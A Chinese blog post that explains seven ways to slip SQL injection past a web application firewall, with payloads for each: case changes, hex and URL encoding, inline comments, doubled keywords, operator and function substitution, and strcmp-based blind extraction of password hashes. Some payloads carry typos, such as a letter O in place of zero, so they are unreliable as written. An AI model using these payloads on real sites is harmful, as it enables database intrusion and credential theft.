当前位置：首页 > news >正文

WAF绕过常见方法

news 来源：原创 2024/5/10 8:06:05

前面写了WAF如何检测，现在直接上WAF常见的一些绕过方法。

方法1:变换大小写

实例:

比如WAF拦截了union，那就使用Union、UnloN等方式绕过。

方法2:编码绕过

实例1:

WAF检测敏感字~，则可以用Ox7e代替，如extractvalue(1,concat('~'.database())可以写成extractvalue(1,concat(Ox7e,database())).

实例2:

WAF检测敏感字"admin'，则可以用Ox61646d696e代替，如select name,passfrom userswhere name='admin'可以替换成select name,pass from users where name=Ox61646d696e.

实例3:

WAF检测敏感字select,可以在URL中将select变成%73elEcT编码结合大小写变换绕过WAF。实例4:可以用%09、%0a、%0b、%Oc、%0d、%a0、!**1、/*somewords*/等来替换空格。

方法3:利用注释符

适用于WAF只过滤了一次危险的语句，而没有阻断整个查询语句的场合。

实例:

原查询语句为:?id=1 union select 1,2,3，对于这条查询,WAF过滤了一次union和select，我们可以用内敛注释符注释掉里面的过滤掉，如?id=1/*union*/union /*select*/select 1,2,3

方法4:重写

适用于WAF只过滤—次敏感字的情况。

实例:

WAF过滤敏感字union，但只过滤一次，则可以写出类似ununionion这样的，过滤一次union后就会执行我们的查询了:?id=1 ununionion select 1,2,3

方法5:比较操作符替换

适用于某—比较操作符(如等号)被过滤的情况。

实例1:

!=不等于，>不等于，<小于，>大于，这些都可以用来替换=来绕过。

比如要判断某个值是不是74，假设=被过滤，则可以判断是不是大于73，是不是小于75,然后就知道是74了:/?id=1 and ascii(lower(mid((select pwd from users limit 1,1),1,1))>73

/?id=1 and ascii(lower(mid((select pwd from users limit 1,1),1,1)))<75

实例2:

WAF将=、>、<全部过滤，则可以利用like来绕过，如?id=1' or 1 like 1

方法6:同功能函数替换

适用于某—函数被过滤的情况。

实例:

假如substring()被WAF过滤，但substring()可以用同功能的mid()，substr()等函数来替换，都是用来取字符串的某—位字符的。

原查询语句: substring((select 'password'),1,1)= Ox70替换后的查询语句:

substr((select 'password'),1,1)= Ox70mid((select 'password'),1,1) = Ox70

方法7:盲注的活用

适用于页面无回显或多种函数、逻辑运算符被过滤的情况。实例: strcmp(expr1,expr2)用来比较两个值，如果expr1=expr2,则函数返回0，expr1<expr2则返回-1,expr1>expr2则返回1。

假如index.php?uid=123页面返回是正确的，但WAF过滤了and和or ,

原查询语句index.php?uid=123 and left((select hash from users limit 0,1),1)='B'，可用

index.php?uid=strcmp(left((select hash from users limit 0,1).1),0x42)+123来替换，通过盲猜hash的第一位，如果第一位等于Ox42也就是B，那么strcmp()将返回0，0+123=123,所以页面应该是正确的。否则就说明不是B，这样猜就不用and和or了.